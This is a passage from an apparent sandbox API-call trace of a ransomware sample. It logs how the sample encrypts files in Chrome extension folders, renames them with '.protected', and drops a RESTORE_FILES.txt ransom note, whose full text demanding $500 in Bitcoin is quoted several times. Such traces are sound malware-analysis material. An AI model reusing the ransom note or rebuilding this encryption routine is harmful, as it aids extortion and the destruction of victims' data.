$500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.583] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.583] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.583] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.583] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.583] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.583] CloseHandle (hObject=0x164) returned 1 [0080.583] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0080.584] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt") returned 141 [0080.584] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0080.584] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0080.584] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*") returned 143 [0080.584] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.584] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.584] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.584] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.584] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.584] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.584] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\.") returned 143 [0080.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.585] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.585] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.585] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.585] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.585] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.585] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.585] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\..") returned 144 [0080.585] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.585] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.585] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.585] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.585] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.585] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.585] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.585] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.586] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.586] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.586] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.586] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.587] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.587] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.587] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.587] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.587] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.587] CloseHandle (hObject=0x168) returned 1 [0080.587] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.protected") returned 165 [0080.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.protected")) returned 1 [0080.588] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.588] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.588] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0080.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.588] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.588] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.589] lstrlenA (lpString="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") returned 684 [0080.589] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.589] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.589] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.589] CloseHandle (hObject=0x164) returned 1 [0080.589] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0080.589] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv") returned 141 [0080.589] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0080.589] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0080.589] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*") returned 143 [0080.589] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.590] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.590] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.590] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.590] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.590] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.590] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\.") returned 143 [0080.590] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.590] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.590] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.590] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.590] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.590] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.590] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.590] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\..") returned 144 [0080.590] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.590] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.590] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.590] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.590] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.590] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.590] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.591] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.591] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.591] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.591] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.591] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.592] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.592] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.592] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.592] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.592] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.592] CloseHandle (hObject=0x168) returned 1 [0080.592] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.protected") returned 165 [0080.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.protected")) returned 1 [0080.593] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.593] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.593] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0080.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.594] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.594] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.595] lstrlenA (lpString="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") returned 684 [0080.595] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.595] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.595] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.595] CloseHandle (hObject=0x164) returned 1 [0080.595] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="Windows") returned -1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="Program Files") returned 